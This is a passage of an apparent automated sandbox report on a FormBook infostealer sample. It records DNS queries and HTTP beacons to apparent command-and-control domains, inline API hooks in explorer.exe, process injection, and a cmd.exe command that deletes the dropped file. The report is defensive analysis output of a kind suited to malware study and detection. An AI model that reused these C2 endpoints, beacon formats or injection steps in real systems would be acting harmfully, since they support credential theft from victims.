                                          Nov 26, 2020 08:29:15.399085045 CET53607788.8.8.8192.168.2.6
                                          Nov 26, 2020 08:29:16.189421892 CET5379953192.168.2.68.8.8.8
                                          Nov 26, 2020 08:29:16.224932909 CET53537998.8.8.8192.168.2.6
                                          Nov 26, 2020 08:29:16.457114935 CET5468353192.168.2.68.8.8.8
                                          Nov 26, 2020 08:29:16.500622034 CET53546838.8.8.8192.168.2.6
                                          Nov 26, 2020 08:29:16.675836086 CET5932953192.168.2.68.8.8.8
                                          Nov 26, 2020 08:29:16.711163044 CET53593298.8.8.8192.168.2.6
                                          Nov 26, 2020 08:29:21.984956980 CET6402153192.168.2.68.8.8.8
                                          Nov 26, 2020 08:29:22.021745920 CET53640218.8.8.8192.168.2.6
                                          Nov 26, 2020 08:29:26.549397945 CET5612953192.168.2.68.8.8.8
                                          Nov 26, 2020 08:29:26.737931013 CET53561298.8.8.8192.168.2.6
                                          Nov 26, 2020 08:29:47.298248053 CET5817753192.168.2.68.8.8.8
                                          Nov 26, 2020 08:29:47.642015934 CET53581778.8.8.8192.168.2.6
                                          Nov 26, 2020 08:29:48.052105904 CET5070053192.168.2.68.8.8.8
                                          Nov 26, 2020 08:29:48.095624924 CET53507008.8.8.8192.168.2.6
                                          Nov 26, 2020 08:29:51.215604067 CET5406953192.168.2.68.8.8.8
                                          Nov 26, 2020 08:29:51.255037069 CET53540698.8.8.8192.168.2.6
                                          Nov 26, 2020 08:30:08.060817003 CET6117853192.168.2.68.8.8.8
                                          Nov 26, 2020 08:30:08.402991056 CET5701753192.168.2.68.8.8.8
                                          Nov 26, 2020 08:30:08.407228947 CET53611788.8.8.8192.168.2.6
                                          Nov 26, 2020 08:30:08.430083990 CET53570178.8.8.8192.168.2.6
                                          Nov 26, 2020 08:30:29.262655973 CET5632753192.168.2.68.8.8.8
                                          Nov 26, 2020 08:30:29.332756996 CET53563278.8.8.8192.168.2.6

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Nov 26, 2020 08:29:16.457114935 CET192.168.2.68.8.8.80xe265Standard query (0)g.msn.comA (IP address)IN (0x0001)
                                          Nov 26, 2020 08:29:26.549397945 CET192.168.2.68.8.8.80x9f9cStandard query (0)www.solidconstruct.siteA (IP address)IN (0x0001)
                                          Nov 26, 2020 08:29:47.298248053 CET192.168.2.68.8.8.80xcf3fStandard query (0)www.hongreng.xyzA (IP address)IN (0x0001)
                                          Nov 26, 2020 08:30:08.060817003 CET192.168.2.68.8.8.80x869aStandard query (0)www.asacal.comA (IP address)IN (0x0001)
                                          Nov 26, 2020 08:30:29.262655973 CET192.168.2.68.8.8.80x7da1Standard query (0)www.kornteengoods.comA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Nov 26, 2020 08:29:16.500622034 CET8.8.8.8192.168.2.60xe265No error (0)g.msn.comg-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                          Nov 26, 2020 08:29:26.737931013 CET8.8.8.8192.168.2.60x9f9cNo error (0)www.solidconstruct.site198.54.117.244A (IP address)IN (0x0001)
                                          Nov 26, 2020 08:29:47.642015934 CET8.8.8.8192.168.2.60xcf3fName error (3)www.hongreng.xyznonenoneA (IP address)IN (0x0001)
                                          Nov 26, 2020 08:30:08.407228947 CET8.8.8.8192.168.2.60x869aNo error (0)www.asacal.com156.241.53.196A (IP address)IN (0x0001)
                                          Nov 26, 2020 08:30:29.332756996 CET8.8.8.8192.168.2.60x7da1Name error (3)www.kornteengoods.comnonenoneA (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.solidconstruct.site
                                          • www.asacal.com

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.649750198.54.117.24480C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Nov 26, 2020 08:29:26.911973953 CET5347OUTGET /jqc/?JfEtEZgp=AQxPeURRQ9kC4DgOk8VME5njQ8dFSmWtzYEqQ7tz67PuOtzOYn8gv4wq3HEWg5IvV5fpD9rFbA==&ojq0s=RzulsD HTTP/1.1
                                          Host: www.solidconstruct.site
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.649755156.241.53.19680C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Nov 26, 2020 08:30:08.610979080 CET6108OUTGET /jqc/?JfEtEZgp=cE9UUOc3pLPT0LAdHSIP3evlMF3IBhbdmq5wG0CQLEBsctkiCkQzhS7S4EgmhhRecsIvRlsotA==&ojq0s=RzulsD HTTP/1.1
                                          Host: www.asacal.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Nov 26, 2020 08:30:09.292335033 CET6118INHTTP/1.1 302 Moved Temporarily
                                          Date: Thu, 26 Nov 2020 07:30:08 GMT
                                          Server: Apache
                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                          Pragma: no-cache
                                          Set-Cookie: PHPSESSID=u9i0r05tpvbtv5qber0ofb8qs2; path=/
                                          Set-Cookie: PHPSESSID=ft1su6f9qnak6jout2tis60pq6; path=/
                                          Upgrade: h2
                                          Connection: Upgrade, close
                                          Location: /
                                          Content-Length: 0
                                          Content-Type: text/html; charset=gbk


                                          Code Manipulations

                                          User Modules

                                          Hook Summary

                                          Function NameHook TypeActive in Processes
                                          PeekMessageAINLINEexplorer.exe
                                          PeekMessageWINLINEexplorer.exe
                                          GetMessageWINLINEexplorer.exe
                                          GetMessageAINLINEexplorer.exe

                                          Processes

                                          Process: explorer.exe, Module: user32.dll
                                          Function NameHook TypeNew Data
                                          PeekMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xEE
                                          PeekMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xEE
                                          GetMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xEE
                                          GetMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xEE

                                          Statistics

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          Analysis Process: PT300975-inv.exe PID: 7124 Parent PID: 5852

                                          General

                                          Start time:08:28:24
                                          Start date:26/11/2020
                                          Path:C:\Users\user\Desktop\PT300975-inv.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\PT300975-inv.exe'
                                          Imagebase:0xc50000
                                          File size:559616 bytes
                                          MD5 hash:025544A9014CF1667E8A1D4FF68DA253
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Analysis Process: mscorsvw.exe PID: 5844 Parent PID: 7124

                                          General

                                          Start time:08:28:25
                                          Start date:26/11/2020
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                                          Imagebase:0xc20000
                                          File size:107592 bytes
                                          MD5 hash:38368FC9F84C7A27D0C8CD8E1543F172
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate

                                          Analysis Process: explorer.exe PID: 3440 Parent PID: 5844

                                          General

                                          Start time:08:28:29
                                          Start date:26/11/2020
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:
                                          Imagebase:0x7ff6f22f0000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Analysis Process: ipconfig.exe PID: 1040 Parent PID: 3440

                                          General

                                          Start time:08:28:43
                                          Start date:26/11/2020
                                          Path:C:\Windows\SysWOW64\ipconfig.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                          Imagebase:0xe30000
                                          File size:29184 bytes
                                          MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate

                                          Analysis Process: cmd.exe PID: 6064 Parent PID: 1040

                                          General

                                          Start time:08:28:48
                                          Start date:26/11/2020
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe'
                                          Imagebase:0x2a0000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Analysis Process: conhost.exe PID: 724 Parent PID: 6064

                                          General

                                          Start time:08:28:51
                                          Start date:26/11/2020
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff61de10000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Disassembly

                                          Code Analysis

                                          Reset < >